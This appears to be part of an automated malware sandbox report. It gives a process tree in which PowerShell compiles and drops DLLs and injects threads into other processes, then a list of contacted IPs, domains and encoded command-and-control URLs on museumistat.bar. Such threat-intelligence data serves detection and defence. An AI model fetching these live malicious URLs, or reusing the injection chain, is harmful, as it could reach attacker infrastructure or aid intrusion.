csc.exe 49->67         started        69 csc.exe 49->69         started        71 conhost.exe 49->71         started        73 powershell.exe 53->73         started        95 C:\Users\user\AppData\Local\...\eutk2hxp.dll, PE32 55->95 dropped 76 cvtres.exe 55->76         started        97 C:\Users\user\AppData\Local\...\babtdr3v.dll, PE32 58->97 dropped signatures13 process14 file15 99 C:\Users\user\AppData\Local\...\yycrjy0w.dll, PE32 62->99 dropped 78 cvtres.exe 62->78         started        101 C:\Users\user\AppData\Local\...\5nzflxas.dll, PE32 67->101 dropped 80 cvtres.exe 67->80         started        103 C:\Users\user\AppData\Local\...\11mxocay.dll, PE32 69->103 dropped 135 Modifies the context of a thread in another process (thread injection) 73->135 137 Maps a DLL or memory area into another process 73->137 139 Creates a thread in another existing process (thread injection) 73->139 82 csc.exe 73->82         started        85 csc.exe 73->85         started        87 conhost.exe 73->87         started        signatures16 process17 file18 91 C:\Users\user\AppData\Local\...\fyriofhk.dll, PE32 82->91 dropped 89 cvtres.exe 82->89         started        93 C:\Users\user\AppData\Local\...\mrf10rqm.dll, PE32 85->93 dropped process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
31.41.44.3
 museumistat.bar Russian Federation
56577 ASRELINKRU false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
museumistat.bar 31.41.44.3 true
myip.opendns.com 102.129.143.42 true
222.222.67.208.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://museumistat.bar/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/9blP_2FAE_2FFwEHiHE7/YS8VB72J_2FAJJllSzs/fyphXYY7W5oXrGE4G68BTo/K6uxe0s8owaZT/sJxgOiGF/toQb9bzuaSQoxlM767HxEUz/ojykuv_2Fm/zAlx3F69HisyQxGCo/YrZLBqFxHDh8/rWHutgpt4HV/9AGOgb99_2BjD6/GPBMSBdUStdt1oIDAqsXJ/Zv_2BHFepXyMKGeg/AYLFYPerTsZQFJf/UksyhZMrYb3d23pSok/_2BcgBxCR/B.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/m4PVNjgat1g0/6_2Btp70Ci0/aungsV13kBUs5a/u2A8XHXxV0G6qtvrny9S2/1bGzk7HyzbfK_2FU/H_2BzwQBI0CSjs2/U1xYaVr4zjQvZiLchv/4aLCBz0CM/68jv0usMkhT2JOF9ESfc/julfpSuq9tErtsl1vT0/5cBxjWFbHYxsgooRJoWIHy/X7bt5vrbFueOy/GXHEBf2y/a48Hwj5cem9DF_2FgVMHxJc/2BxgNa1_2B/9wP6Mz_2F/66hqNdd.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/WscgLp0a9mza4KVSZP_2F/qW_2BiGKRm2pEjNT/0yit17kTcYKALfY/Dca3d6njS6Q8Up7_2B/S1Q5c3m1L/htfRX_2FNP4zOUbJdHE0/XcLw_2FUradRuvSZYkz/0N0BHZth_2BNigSkIsxFbw/Kr0gcIwYitNQb/vtve9mnb/uJ6GCaAgncMj3aalqD8JgFA/MTnXx5EVkL/iZOp4aPFrTK2CzYfp/vJg2ovriq7si/LWFvH6yBaQn/MYMUZGLdg/H3Ww.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/2Ghwj5VMTy/n0fnHab4HU0c0skVA/H18bJ5bl99Je/rqcYKjw2LjF/oo3IrxIrGawPDh/WY3GQdM2gSEeA7t2qCkIS/1aubp3gxSiryQwCt/uHpd4lSUp2YM4rr/8xTqKKzowmzwk_2FmS/XK1nPBS4G/Dq2A1gKI6_2BPykbobVi/Bx98dtZc4Ves6LJvXCA/8pS6Ds7iy1MLmIYsX5uHS_/2BoRknJx2A5IW/_2BhddqS/olB0zaEdsk_2Fal/9PLaB.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/drew/VV_2BwS8Vr7FLZE_2Bx/hn00HRykakafUORzXuronm/S2NceGwHyG0lw/75DrHXVA/R1_2F_2Fj4Y_2FxlTCM7oLQ/KdAvtV7PTd/INtjv0kJxFO5LBByA/6IEADuWC8M_2/BC2pEweOA_2/FLFj0zJxXN5f0_/2FXT1i0K56I9LZMvALSyv/P7hw8vY32OG3jn28/BOFJl0FutRVUckU/Qu6XnvXUiNRUBGVYb6/29y_2F1_2/FgyW49mKvtH4XdHIh58L/Va1en8p.jlk true
  • Avira URL Cloud: safe
 unknown
http://museumistat.bar/favicon.ico true
  • Avira URL Cloud: safe
 unknown